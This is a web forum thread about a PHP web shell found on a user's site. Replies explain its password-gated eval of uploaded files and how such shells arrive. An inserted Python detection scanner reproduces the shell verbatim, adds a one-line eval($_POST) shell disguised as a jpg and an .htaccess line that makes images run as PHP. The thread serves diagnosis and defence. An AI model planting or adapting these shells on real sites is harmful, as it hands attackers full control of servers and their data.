  #1 Dijup (Kathmandu, Nepal):

    What is the work of this code?

    What is the capability of this code?
    PHP Code:
    <?php
    // Only fatal errors are reported (E_ERROR == 1), so a missing field or a
    // failed fopen() produces no notices in the response.
    error_reporting(1);
    // PHP 4-era long-name array; declared here but never used below.
    global $HTTP_SERVER_VARS;

    function say($t) {
        echo "$t\n";
    };

    // Emits an md5 marker ("testdata_start", "testdata_pass", ...) so the
    // client driving this script can tell which branch it reached.
    function testdata($t) {
        say(md5("testdata_$t"));
    };

    echo "<pre>";
    testdata('start');
    // Password gate: the POST field "p" is hashed with unsalted MD5 and
    // compared against a hard-coded digest.
    if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3") {
        // Read the whole uploaded file "f" ($HTTP_POST_FILES is the PHP 4
        // name for $_FILES) straight from its upload temp path ...
        if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"])) {
            // ... and execute its contents as PHP.
            eval($code);
        } else {
            testdata('f');      // password correct, but no usable upload
        };
    } else {
        testdata('pass');       // wrong or missing password
    };
    testdata('end');
    echo "</pre>";
    ?>
    I got this in one of my sites.

  #2 praetor:
    Code injection. It executes an uploaded PHP file.

  #3 AnthonySterling (North-East, UK):
    Firstly, that's some god-awful code.

    Secondly, and more to the point, the code appears to process a form.

    One form element, identified by 'P', contains a password of sorts which, when matched, evaluates the PHP contained in a second, uploaded file element.

    Quite, quite dangerous.

  #4 Dijup (Kathmandu, Nepal):
    What are the limits of this file? I mean, what information can this file take from the site, and what harm can it cause to the site?

  #5 AnthonySterling (North-East, UK):
    Well, for starters, it could delete EVERYTHING from the site, not to mention copy its contents to a remote site.

    Along with your database details too....

    Anything PHP can do, this script provides unrestricted access to.

    As previously stated, nasty code indeed.

  #6 Dijup (Kathmandu, Nepal):
    Thanks for the info to all.

  #7 Dijup (Kathmandu, Nepal):
    Is FCK editor the main reason for this file?

  #8 Dijup (Kathmandu, Nepal):
    How can we get rid of these files? I can see this type of file on my site every other day.

  #9 SitePoint Guru (Orlando):
    Quote Originally Posted by Dijup:
    How can we get rid of these files? I can see this type of file on my site every other day.
    Then you have security problems. Some application, or custom code, is allowing people access to your box. Patch all of the open-source software you have.

  #10 shoorace (Florida):
    Yeah, open-source software like WordPress 2.1.1 had such a security hole in its blog modules.

  #11 Dijup (Kathmandu, Nepal):
    Not only WordPress; I found this type of activity in FCK editor too.

    They upload the PHP code and a .htaccess file and take control of the website.
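
    Pulling the posts above together: the shell in post #1 is recognisable by eval() applied to request-controlled data (the uploaded file, read through the PHP 4-era $HTTP_POST_FILES array) behind a hard-coded md5() password, and post #11 adds the .htaccess trick that makes an upload directory execute PHP. The scanner below is an added example, not code from this thread or from any of the products mentioned; it walks a web root and reports files showing those indicators, whatever their extension. The directory layout, the benign samples and the "photo.jpg" shell are constructed for the demonstration; the malicious .php sample is the code quoted in post #1.

```python
"""Scan a web root for PHP shells like the one quoted in post #1.

Indicators, taken from that code and from post #11:
  * eval() in a file that also reads request-controlled data,
  * a hard-coded md5() password gate,
  * a .htaccess that routes extra extensions to the PHP engine.
Every file is inspected regardless of extension, since such a .htaccess
makes "photo.jpg" executable too.  The sample tree below is constructed.
"""
import os
import re
import tempfile

PHP_TAG_RE = re.compile(r"<\?(?:php\b|=|\s)")
EVAL_RE = re.compile(r"\beval\s*\(")
INPUT_RE = re.compile(
    r"\$(?:HTTP_POST_FILES|_FILES|_POST|_GET|_REQUEST|_COOKIE|HTTP_RAW_POST_DATA)\b"
    r"|php://input")
MD5_GATE_RE = re.compile(r"\bmd5\s*\([^)]*\)\s*={2,3}\s*['\"][0-9a-f]{32}['\"]")
# AddHandler/AddType/SetHandler lines mentioning php hand other names to PHP.
HTACCESS_RE = re.compile(r"^\s*(?:AddHandler|AddType|SetHandler)\b.*php", re.I | re.M)


def php_indicators(src):
    """Return the list of indicators present in one file's contents."""
    found = []
    if PHP_TAG_RE.search(src) and EVAL_RE.search(src):
        found.append("eval")
    if INPUT_RE.search(src):
        found.append("request-controlled input")
    if MD5_GATE_RE.search(src):
        found.append("hard-coded md5 password gate")
    return found


def is_backdoor(src):
    """eval() of request-controlled data is the defining pattern of the shell."""
    found = php_indicators(src)
    return "eval" in found and "request-controlled input" in found


def scan_webroot(root):
    """Walk ROOT and return {relative path: [reasons]} for suspicious files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name == ".htaccess":
                if HTACCESS_RE.search(src):
                    findings[rel] = [".htaccess routes extra extensions to PHP"]
            elif is_backdoor(src):
                findings[rel] = php_indicators(src)
    return findings


# Constructed sample tree: the shell from post #1 (verbatim), a shell hidden
# in a "jpg", a malicious .htaccess, a benign form handler and a normal .htaccess.
SHELL_FROM_POST_1 = r"""<?php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t) { echo "$t\n"; };
function testdata($t) { say(md5("testdata_$t")); };
echo "<pre>"; testdata('start');
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){
 if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
  eval($code);
 }else{ testdata('f'); };
}else{ testdata('pass'); };
testdata('end'); echo "</pre>"?>
"""
SAMPLE_TREE = {
    "uploads/image.php": SHELL_FROM_POST_1,
    "uploads/photo.jpg": 'GIF89a\n<?php eval($_POST["c"]); ?>\n',
    "uploads/.htaccess": "AddType application/x-httpd-php .jpg\n",
    "contact.php": '<?php\n$n = htmlspecialchars($_POST["name"] ?? "");\necho "<p>Hi $n</p>";\n',
    ".htaccess": "RewriteEngine On\nRewriteRule ^blog/(.*)$ index.php?p=$1 [L]\n",
}


def write_sample_tree(root):
    for rel, content in SAMPLE_TREE.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo():
    """Write the sample tree to a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        write_sample_tree(root)
        return scan_webroot(root)


if __name__ == "__main__":
    for rel, reasons in sorted(demo().items()):
        print(f"{rel}: {', '.join(reasons)}")
```

    Run against a real document root the scan flags uploads/image.php, uploads/photo.jpg and uploads/.htaccess while leaving contact.php (it reads $_POST but never evals anything) and the RewriteRule .htaccess alone. The content match is deliberately tied to the pattern in post #1; on a live site it belongs next to a comparison against a clean copy of the application and a look at recent modification times in upload directories, because obfuscated shells (base64_decode, preg_replace /e, create_function) will not trip these three regexes.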

  #12 Dijup (Kathmandu, Nepal):
    This can be the solution:
    http://www.whyron.com/http.htm

    I am trying this solution.

    Let's see.

